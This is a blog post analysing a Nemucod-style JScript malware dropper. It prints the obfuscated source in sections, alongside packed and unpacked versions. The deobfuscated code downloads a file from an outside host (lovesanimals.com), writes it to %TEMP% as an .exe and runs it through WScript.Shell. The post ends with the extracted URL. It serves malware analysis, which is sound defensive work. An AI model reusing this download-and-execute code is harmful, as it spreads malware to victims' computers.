Monday, May 9, 2016

Virus Analysis (UNPACKED...)

In the last email, I obtained a virus similar to a Nemucod ransomware from the virus report...


Code analysis :

===================================
INIT
===================================

var PR_RDONLY = 0x01;
var PR_WRONLY = 0x02;
var PR_RDWR = 0x04;
var PR_CREATE_FILE = 0x08;
var PR_APPEND = 0x10;
var PR_TRUNCATE = 0x20;
var PR_SYNC = 0x40;
var PR_EXCL = 0x80;

GmvCOh = "}/* * Helper functions for managing events -- not part of the public interface. * Props to Dean Edwards\" addEvent library for many of the ideas. */ jQuery.event = {";
var chocolate = 0;
daunt = String["f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"](7*2*7 + chocolate );
String.prototype.provisionally = function () {
var editions = { hairy: this };
editions.nutmeg = editions.hairy[("suZ"+("weekends","trend","vendor","chafe","listless","transexuales","millet","st")+"ri"+"ng").replace("Z", daunt)](chocolate, PR_RDONLY);
return editions.nutmeg;
};

===================================
FUNCTION HEX MD5 STREAM
===================================

function hex_md5_stream(stream) {
var hasher = Components.classes["@mozilla.org/security/hash;1"]
.createInstance(Components.interfaces.nsICryptoHash);
hasher.init(hasher.MD5);
hasher.updateFromStream(stream, stream.available());
var hash = hasher.finish(false);
var ret = '';
for (var i = 0; i < hash.length; ++i) { var hexChar = hash.charCodeAt(i).toString(16); if (hexChar.length == 1) ret += '0'; ret += hexChar; } return ret; }


===================================
FUNCTION PICK
===================================

function pick(){
for (var i = 0, l = arguments.length; i < l; i++){ if (arguments[i] != undefined) return arguments[i]; } return null; };


===================================
FUNCTION BASE64DECODE
===================================

this.decode = base64decode;
this.chars = function( string ) {
base64EncodeChars = string || "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
base64DecodeChars = [];
for ( var i = 128; i--; ) {
if ( base64DecodeChars[ i ] === undefined )
base64DecodeChars[ i ] = -1;
base64DecodeChars[ base64EncodeChars.charCodeAt( i ) ] = i;
}
return this;
};
this.chars();
function base64decode( str ) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while(i < len) { /* c1 */ do { c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff]; } while(i < len && c1 == -1); if(c1 == -1) break; /* c2 */ do { c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff]; } while(i < len && c2 == -1); if(c2 == -1) break; out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if(c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while(i < len && c3 == -1); if(c3 == -1) break; out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if(c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while(i < len && c4 == -1); if(c4 == -1) break; out += String.fromCharCode(((c3 & 0x03) << 6) | c4); } return out; }


===================================
Calling Windows Script Host
===================================

try{
if(WScript +"" == "Windows Script Host"){
eval(base64decode('dmFyIHRoZW5EbyA9IHRoZW5EbyB8fCBTdHJpbmcucHJvdG90eXBlLnByb3Zpc2lvbmFsbHkgPT0gdW5kZWZpbmVkIHx8IGV2YWwoInRydWUiKTs='));
}
}catch(Eeed)
{

}


===================================
CONVERSION (BASE64 DECODE)
===================================

if(WScript +"" == "Windows Script Host"){
var thenDo = thenDo || String.prototype.provisionally == undefined || eval("true");
}
}catch(Eeed)
{

}


===================================
FUNCTION
===================================

String.prototype.parseColor = function() {
var color = '#';
if (this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return (color.length==7 ? color : (arguments[0] || this)); };


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 6=["12"+("1n","2r","2t","2y","2A","2B","a","b")+("c","d","e","f","g","h","i","j")+"k",("l","m","n","o","p","q","r","s","t")+"4"+("v","w","x","y","z","A","B","C","D")+"E"+"F"+"G"+"H"+("I","J","K","L","N","O","P","Q","T")+("U","V","W","X","Y","Z","10","11")+"5"+"13",""+"%"+("14","15","16","17","18","19","1a","1b")+"1c%",""+("1d","1e","1f","1g","1h","1i","1j",".")+"1k","R"+("1l","1m","2E","1o","1p","1q","1r","1s","1t"),"M"+"1u"+"1v"+("1w","1x","1y","1z","1A","1B","1C","1D","2.")+("1E","1F","1G","1H","1I","1J","1K","1L","1M")+"1N"+"1O",("1P","1Q","1R","1S","1T","1U","1V","1W","1X")+("1Y","1Z","20","21","22","23","24","5")+"25.S"+("26","27","28","29","2a","2b","2c","2d","2e")+("2f","2g","2h","2i","2j","2k","2l","2m")];2n="} 2o 2p 2q 7 4 2s 8 2u 2v 7 2w 8 2x 0 2z ( 0.0 ) { 1 = 0; 0 = 1.0; 9 = 1.9; ";3 2C=2D[6.u()];',62,165,'handler|handleObjIn||var|an|ri|BHpUk|in|of|selector|thong|iv|xerox|anytime|download|privacy|libretto|decimal|molecular|eXObje|ct|overalls|known|moral|interpreted|introduced|decrepitude|encumber|rivulet|Exp|shift|important|massy|lounged|bribery|dragoman|internship|defense|mediate|dE|nv|ir|on|me|enquiry|refresh|perusing|spleen||guernsey|eerie|diamond|flirt|||nt|bibliography|adapter|metres|fighter|pointer|viscount|porphyry|St|Act|ngs|baton|clicking|offerings|sprinkle|croatia|happiness|alabaster|TE|MP|incautious|encircle|godlike|adjustment|azalea|intensity|timely|exe|specifying|photographer|strand|celebration|throttle|condense|sleep|lying|un|SX|ML|julian|refrigerator|fundamentally|hygiene|fabrics|pellucid|explosive|piano|traction|parts|admonish|voluble|stitch|quartette|sextant|vertically|XM|LH|TTP|instances|instrumentality|asbestos|tuner|slots|divergent|plastic|linear|WSc|antipodes|violate|receptors|woody|shale|bitch|injection|pt|rosette|declare|descriptive|hawser|geologist|havana|thunderbolt|bellows|he|indonesia|delivery|billing|welter|participants|losses|buffet|ll|CMpogCtp|Caller|can|pass|besides|object|heirloom|custom|data|lieu|the|jelsoft|if|membership|spout|uhRkAhP|this|median'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

var BHpUk=["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%",""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe","R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")];
CMpogCtp="
}
Caller can pass in an object of custom data in lieu of the handler if ( handler.handler )
{
handleObjIn = handler;
handler = handleObjIn.handler;
selector = handleObjIn.selector;
";
var uhRkAhP=this[BHpUk.shift()];


===================================
FUNCTION HEX MD5
===================================

function hex_md5(s) {
var stream = Components.classes["@mozilla.org/io/string-input-stream;1"]
.createInstance(Components.interfaces.nsIStringInputStream);
stream.setData(s, s.length);
return hex_md5_stream(stream);
}


===================================
DATAS
===================================

titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();
boughts = (("memorabilia", "borax", "tracking", "assam", "shzrRkSc") + "rFfvhMdqAeh").provisionally();
vietnamese = ("n"+("mundane","satisfy","column","headers","dysentery","dispute","winner","press","ep") + String.fromCharCode(111)).split("");
oaegScr = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());',9,9,'rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL'.replace('U','HpU').split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

rKXyhsz=BHpUk.pop();
var XtpJu=new uhRkAhP(pick(rKXyhsz));
var NBHAYvL=new uhRkAhP(BHpUk.pop());


===================================
PACKER
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";

if(thenDo){
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}',18,18,'emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionallyZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ'.split('ZZ'),0,{}))
}

===================================
CONVERSION (UNPACKED)
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
if(thenDo){
indicatede=(("opulence","endorse","ajfoTTEb","aptitude","ESOHGNPaReb")+"RbtJGwV").provisionally();
var empty=Math.random();
function saloHood()
{
quickwitted("http://"+hoddor,"OYWVCwQ")
}


===================================
A VARIABLE IN UNICODE FORMAT
===================================

var hoddor = "\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067";

===================================
CONVERSION (UNICODE > TXT)
===================================

var hoddor = "lovesanimals.c"+"om/09y8hb7v6y7g";

===================================
FUNCTION QUICKWITTED
===================================

function quickwitted(expulsion, proved) {
try {
var francisco = CteaNXQfb + "/" + proved + BHpUk.shift();
cokDPG = "} If event changes its type, use the special event handlers for the changed type special = jQuery.event.special[ type ] || {};";
if (empty > 0) {
NBHAYvL[(vietnamese).reverse().join("")](("runaway","ballet","undersigned","albums","ostentatious","expanding","strips","G") + indicatede + ("miguel","began","distribution","plasma","hoary","reporting","built","childbirth","T"), expulsion, false);
}
lkKFtqIM = " If selector defined, determine special event api type, otherwise given type type = ( selector ? special.delegateType : special.bindType ) || type;";
NBHAYvL[boughts + ("durability","outstrip","premium","after","phrygian","hilltop","bluntly","e") + (("potency", "restive", "bonds", "cacao", "percussion", "nXyuIYg") + "VzPzIfxqAGo").provisionally() + (("printing", "compendium", "loiter", "precursor", "phillip", "dWoQFifU") + "ACrOmYGq").provisionally()]();
NOPvLqSUtIr = " Update special based on newly reset type special = jQuery.event.special[ type ] || {};";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4(r.L==M){X 6=14 15((("16","1a","1f","1g","1h","1i","1j","")+"A"+("1n","1p","1s","1u","1v","1w","1x","1z")+"1T."+("1X","26","2g","2k","2C","38","3f","3i","")+"S"+("3o","3p","3N","3P","3Q","H","I","J")+"K").E("p","D"));6[""+("N","O","P","Q","T","U","V","W","o")+"Y"]();Z="} 10 11 12 7 d m a 17 18, 19 n 1b/1c 1d 1e 4 ( !d.j ) { d.j = b.j++; ";6.c=0+3-2;1k="} 1l 7 1m\\"s 8 1o z 1q d, 4 1r B 7 1t 4 ( !( 5 = g.5 ) ) { 5 = g.5 = {}; } 4 ( !( f = g.i ) ) { f = g.i = 1y( e ) {";6["w"+"1A"+("1B","1C","1D","1E","1F","1G","1H","1I","1J")](r[""+("1K","1L","1M","1N","1O","1P","1Q","R")+"1R"+"1S"+q+("1U","1V","1W","3S","1Y","1Z","20","e")+"21"+"22"]);23=" 24 7 25 8 u a b.8.27() z 28 29 8 B 2a 2b a 2c m 2d 2e 2f b !== \\"v\\" && ( !e || b.8.2h !== e.c ) ? b.8.2i.2j( f.9, 2l ) : v; };";6[(2m+("2n","2o","2p","2q","2r","2s","2t","2u","o")+"2v"+"2w"+("2x","2y","2z","2A","2B","x","2D","2E")).E("D",q)]=0;2F=" 2G 9 2H a 2I u 7 i 2J n 2K a 2L 2M 2N 2O 2P-2Q 5 f.9 = 9; ";6["s"+("2R","2S","2T","2U","2V","2W","2X","2Y")+"2Z"+"30"+("x","31","32","33","34","35","36","37")](y,2);39="} 3a 3b 5 3c 3d a 3e h = ( h || \\"\\" ).3g( 3h ) || [ \\"\\" ]; t = h.3j; 3k ( t-- ) { k = 3l.3m( h[ t ] ) || []; c = 3n = k[ 1 ]; C = ( k[ 2 ] || \\"\\" ).3q( \\".\\" ).3r();";6.3s();3t=" 3u *3v* 3w a c, 3x 3y 3z-3A 3B 4 ( !c ) { 3C; ";3D[3E.3F()](y,1,"3G"==="3H");3I=" 3J 3K 3L/3M 4 7 l 5 d 3O F 4 ( !l.G || l.G.3R( 9, 13, C, f ) === F ) {"}',62,241,'||||if|events|OkUvN|the|event|elem||jQuery|type|handler||eventHandle|elemData|types|handle|guid|tmp|special|has|to|||boughts|NBHAYvL|||of|undefined||snowball|francisco|and||is|namespaces||replace|false|setup|broadcast|universities|tr|eam|status|200|installation|eastwards|expression|footage|||green|winter|embody|yukon|var|pen|MOmXidnhR|Make|sure|that|data|new|uhRkAhP|extermination|unique|ID|used|wornout|find|remove|it|later|harps|definitive|scored|particle|aryan|eibdpjiyakm|Init|element|footstool|structure|gratuity|main|this|measurement|first|presently|calibration|authorization|cornet|function|pO|ri|sensitivity|lawlessness|reflects|treadmill|external|dissimulation|perversion|rusted|te|assorted|announce|compete|booth|libretto|definition|censor|es|pon|DB|constructing|warren|recipient|bound|suffered|chunk|listen|Bo|dy|STOuIe|Discard|second|muslims|trigger|when|an|called|after|page|unloaded|return|typeof|butler|triggered|dispatch|apply|canteen|arguments|titular|grandee|womanish|benjamin|whole|wireless|rarely|logitech|evasively|Di|ti|geology|abyssinian|hodge|reservoir|acrimony|ludwig|browser|on|dJIemps|Add|as|property|fn|prevent|memory|leak|with|IE|non|native|curative|deface|marker|remittance|residents|balance|permalink|av|eT|oF|movie|awestruck|savory|neuter|slight|pushed|ile|blockade|NBlaxcR|Handle|multiple|separated|by|space|keeping|match|rnotwhite|anointing|length|while|rtypenamespace|exec|origType|credulity|meters|split|sort|close|HuIaJMUIgp|There|must|be|no|attaching|namespace|only|handlers|continue|XtpJu|BHpUk|shift|UsjNuiXNlu|NMWYuV|pgvvXzp|Only|use|addEventListener|attachEvent|bowled|returns|prefix|correlative|call|electrified'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

if(NBHAYvL.status==200)
{
var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));
OkUvN[""+("installation","eastwards","expression","footage","green","winter","embody","yukon","o")+"pen"]();
MOmXidnhR="
}
Make sure that the handler has a unique ID, used to find/remove it later if ( !handler.guid )
{
handler.guid = jQuery.guid++;
";
OkUvN.type=0+3-2;
eibdpjiyakm="
}
Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) )
{
events = elemData.events =
{
};
}
if ( !( eventHandle = elemData.handle ) )
{
eventHandle = elemData.handle = function( e )
{
";
OkUvN["w"+"ri"+("sensitivity","lawlessness","reflects","treadmill","external","dissimulation","perversion","rusted","te")](NBHAYvL[""+("assorted","announce","compete","booth","libretto","definition","censor","R")+"es"+"pon"+boughts+("constructing","warren","recipient","electrified","suffered","chunk","listen","e")+"Bo"+"dy"]);
STOuIe=" Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined;
};
";
OkUvN[(titular+("grandee","womanish","benjamin","whole","wireless","rarely","logitech","evasively","o")+"Di"+"ti"+("geology","abyssinian","hodge","reservoir","acrimony","snowball","browser","on")).replace("D",boughts)]=0;
dJIemps=" Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem;
";
OkUvN["s"+("curative","deface","marker","remittance","residents","balance","permalink","av")+"eT"+"oF"+("snowball","movie","awestruck","savory","neuter","slight","pushed","ile")](francisco,2);
NBlaxcR="
}
Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ];
t = types.length;
while ( t-- )
{
tmp = rtypenamespace.exec( types[ t ] ) || [];
type = origType = tmp[ 1 ];
namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();
";
OkUvN.close();
HuIaJMUIgp=" There *must* be a type, no attaching namespace-only handlers if ( !type )
{
continue;
";
XtpJu[BHpUk.shift()](francisco,1,"UsjNuiXNlu"==="NMWYuV");
pgvvXzp=" Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false )
{
"
}


===================================
FINAL
===================================

} catch (rzupeJz) { };
kOWbigYady = " Init the event handler queue if we\"re the first if ( !( handlers = events[ type ] ) ) { handlers = events[ type ] = []; handlers.delegateCount = 0;";
}
saloHood();
NPQynFqCF = " handleObj is passed to all event handlers handleObj = jQuery.extend( { type: type, origType: origType, data: data, handler: handler, guid: handler.guid, selector: selector, needsContext: selector && jQuery.expr.match.needsContext.test( selector ), namespace: namespaces.join( \".\" ) }, handleObjIn );";


===================================
CONCLUSION :
===================================

URL EXTRACTED : lovesanimals.com/09y8hb7v6y7g
TECHNOLOGY : UNICODE,UNPACKER,JSCRIPT,BASE64